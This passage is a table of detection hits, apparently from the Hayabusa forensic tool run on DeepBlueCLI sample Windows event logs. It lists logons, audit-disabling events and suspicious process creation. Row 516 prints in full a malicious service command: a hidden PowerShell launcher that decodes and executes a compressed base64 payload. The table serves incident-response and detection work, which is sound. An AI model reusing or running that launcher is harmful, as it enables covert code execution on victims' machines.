| 434 | 2014-11-29 00:46:12.437 +09:00 | IE10Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x1a23a | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 435 | 2014-11-29 00:48:19.000 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 436 | 2014-11-29 00:48:19.000 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 437 | 2014-11-29 00:48:19.456 +09:00 | IE10Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x1a265 | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 438 | 2016-08-18 23:46:21.297 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 439 | 2016-08-18 23:46:21.297 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 440 | 2016-08-18 23:46:21.750 +09:00 | IE10Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : LogonID: 0x1e056 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 441 | 2016-08-18 23:46:21.750 +09:00 | IE10Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : LogonID: 0x1e3c9 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 442 | 2016-08-18 23:46:21.750 +09:00 | IE10Win7 | 4648 | informational | Explicit Logon | Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 443 | 2016-08-18 23:46:21.750 +09:00 | IE10Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x1e056 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 444 | 2016-08-18 23:46:33.911 +09:00 | IE10Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x1e3c9 | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 445 | 2016-08-18 23:46:34.426 +09:00 | IE10Win7 | 4634 | informational | Logoff | User: IEUser : LogonID: 0x1e3c9 | rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 446 | 2016-08-18 23:46:34.426 +09:00 | IE10Win7 | 4634 | informational | Logoff | User: IEUser : LogonID: 0x1e056 | rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 447 | 2016-08-18 23:47:04.676 +09:00 | IE10Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : LogonID: 0x6831f : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 448 | 2016-08-18 23:47:04.676 +09:00 | IE10Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : LogonID: 0x6832b : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 449 | 2016-08-18 23:47:04.676 +09:00 | IE10Win7 | 4648 | informational | Explicit Logon | Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 450 | 2016-08-18 23:47:04.676 +09:00 | IE10Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x6831f | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 451 | 2016-08-18 23:47:20.053 +09:00 | IE10Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x6832b | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 452 | 2016-08-18 23:47:36.671 +09:00 | IE10Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 453 | 2016-08-18 23:47:37.000 +09:00 | IE10Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 454 | 2016-08-18 23:47:38.102 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 455 | 2016-08-18 23:47:38.102 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 456 | 2016-08-18 23:47:38.430 +09:00 | IE10Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : LogonID: 0x1dc1e : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 457 | 2016-08-18 23:47:38.430 +09:00 | IE10Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : LogonID: 0x1ee41 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 458 | 2016-08-18 23:47:38.430 +09:00 | IE10Win7 | 4648 | informational | Explicit Logon | Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 459 | 2016-08-18 23:47:38.430 +09:00 | IE10Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x1dc1e | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 460 | 2016-08-18 23:48:31.289 +09:00 | IE10Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x1ee41 | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 461 | 2016-08-18 23:49:38.281 +09:00 | IE10Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 462 | 2016-08-18 23:49:39.000 +09:00 | IE10Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 463 | 2016-08-18 23:49:39.844 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 464 | 2016-08-18 23:49:39.844 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 465 | 2016-08-18 23:49:40.000 +09:00 | IE10Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : LogonID: 0x1b293 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 466 | 2016-08-18 23:49:40.000 +09:00 | IE10Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : LogonID: 0x1b2fd : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 467 | 2016-08-18 23:49:40.000 +09:00 | IE10Win7 | 4648 | informational | Explicit Logon | Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 468 | 2016-08-18 23:49:40.000 +09:00 | IE10Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x1b293 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 469 | 2016-08-18 23:51:41.000 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 470 | 2016-08-18 23:51:41.000 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 471 | 2016-08-18 23:52:55.692 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 472 | 2016-08-18 23:52:55.692 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 473 | 2016-08-19 00:28:28.043 +09:00 | IE10Win7 | 4647 | informational | Logoff - User Initiated | User: IEUser : LogonID: 0x1b2fd | rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 474 | 2016-08-19 00:29:27.609 +09:00 | IE10Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 475 | 2016-08-19 00:29:28.000 +09:00 | IE10Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 476 | 2016-08-19 00:29:29.859 +09:00 | IE10Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : LogonID: 0x1aae1 : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 477 | 2016-08-19 00:29:29.859 +09:00 | IE10Win7 | 4624 | informational | Logon Type 2 - Interactive | User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : LogonID: 0x1af2f : (Warning: Credentials are stored in memory) | rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 478 | 2016-08-19 00:29:29.859 +09:00 | IE10Win7 | 4648 | informational | Explicit Logon | Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost | rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 479 | 2016-08-19 00:29:29.859 +09:00 | IE10Win7 | 4672 | informational | Admin Logon | User: IEUser : LogonID: 0x1aae1 | rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 480 | 2016-08-19 00:31:31.000 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 481 | 2016-08-19 00:31:31.000 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 482 | 2016-08-19 00:43:46.923 +09:00 | IE10Win7 | 4719 | high | Disabling Windows Event Auditing | | rules/sigma/builtin/security/win_disable_event_logging.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 483 | 2016-08-19 00:43:46.923 +09:00 | IE10Win7 | 4719 | high | Disabling Windows Event Auditing | | rules/sigma/builtin/security/win_disable_event_logging.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 484 | 2016-08-19 00:43:46.923 +09:00 | IE10Win7 | 4719 | high | Disabling Windows Event Auditing | | rules/sigma/builtin/security/win_disable_event_logging.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 485 | 2016-08-19 00:43:46.923 +09:00 | IE10Win7 | 4719 | high | Disabling Windows Event Auditing | | rules/sigma/builtin/security/win_disable_event_logging.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 486 | 2016-08-19 00:43:46.923 +09:00 | IE10Win7 | 4719 | high | Disabling Windows Event Auditing | | rules/sigma/builtin/security/win_disable_event_logging.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 487 | 2016-08-19 00:43:46.923 +09:00 | IE10Win7 | 4719 | high | Disabling Windows Event Auditing | | rules/sigma/builtin/security/win_disable_event_logging.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 488 | 2016-08-19 00:43:46.923 +09:00 | IE10Win7 | 4719 | high | Disabling Windows Event Auditing | | rules/sigma/builtin/security/win_disable_event_logging.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 489 | 2016-08-19 00:43:46.923 +09:00 | IE10Win7 | 4719 | high | Disabling Windows Event Auditing | | rules/sigma/builtin/security/win_disable_event_logging.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 490 | 2016-08-19 00:43:46.923 +09:00 | IE10Win7 | 4719 | high | Disabling Windows Event Auditing | | rules/sigma/builtin/security/win_disable_event_logging.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 491 | 2016-08-19 00:43:46.923 +09:00 | IE10Win7 | 4719 | high | Disabling Windows Event Auditing | | rules/sigma/builtin/security/win_disable_event_logging.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 492 | 2016-08-19 00:43:46.923 +09:00 | IE10Win7 | 4719 | high | Disabling Windows Event Auditing | | rules/sigma/builtin/security/win_disable_event_logging.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 493 | 2016-08-19 00:43:46.923 +09:00 | IE10Win7 | 4719 | high | Disabling Windows Event Auditing | | rules/sigma/builtin/security/win_disable_event_logging.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 494 | 2016-08-19 01:24:07.515 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 495 | 2016-08-19 01:24:07.515 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 496 | 2016-08-19 01:24:10.343 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 497 | 2016-08-19 01:24:10.343 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 498 | 2016-08-19 01:52:58.000 +09:00 | IE10Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 499 | 2016-08-19 01:52:59.704 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 500 | 2016-08-19 01:52:59.704 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 501 | 2016-08-19 01:55:00.000 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 502 | 2016-08-19 01:55:00.000 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 503 | 2016-08-19 02:39:39.000 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 504 | 2016-08-19 02:39:39.000 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 505 | 2016-08-19 03:46:19.937 +09:00 | IE10Win7 | 4624 | informational | Logon Type 0 - System | Bootup | rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx |
| 506 | 2016-08-19 03:46:20.000 +09:00 | IE10Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 507 | 2016-08-19 03:57:18.515 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 508 | 2016-08-19 03:57:18.515 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 509 | 2016-08-19 03:57:20.937 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 510 | 2016-08-19 03:57:20.937 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 511 | 2016-08-19 04:55:50.000 +09:00 | IE10Win7 | 4625 | medium | Failed Logon From Public IP | | rules/sigma/builtin/security/win_susp_failed_logon_source.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 512 | 2016-08-19 04:55:51.755 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 513 | 2016-08-19 04:55:51.755 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 514 | 2016-08-19 04:57:52.000 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 515 | 2016-08-19 04:57:52.000 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx |
| 516 | 2016-08-19 05:40:21.230 +09:00 | IE10Win7 | 7045 | high | Malicious service installed | Service: SYyGmEHvgHiGYApk : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 517 | 2016-08-19 07:54:48.533 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 518 | 2016-08-19 07:54:48.533 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 519 | 2016-08-19 11:07:47.443 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 520 | 2016-08-19 11:07:47.443 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 521 | 2016-08-19 11:19:46.459 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 522 | 2016-08-19 11:19:46.459 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 523 | 2016-08-19 22:57:54.520 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 524 | 2016-08-19 22:57:54.520 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 525 | 2016-08-20 05:09:55.515 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 526 | 2016-08-20 05:09:55.515 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 527 | 2016-08-20 05:09:57.843 +09:00 | IE10Win7 | 1 | high | Execution Of Not Existing File | | rules/sigma/process_creation/process_creation_susp_image_missing.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
| 528 | 2016-08-20 05:09:57.843 +09:00 | IE10Win7 | 1 | high | Execution Of Other File Type Than .exe | | rules/sigma/process_creation/process_creation_susp_non_exe_image.yml | ../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx |
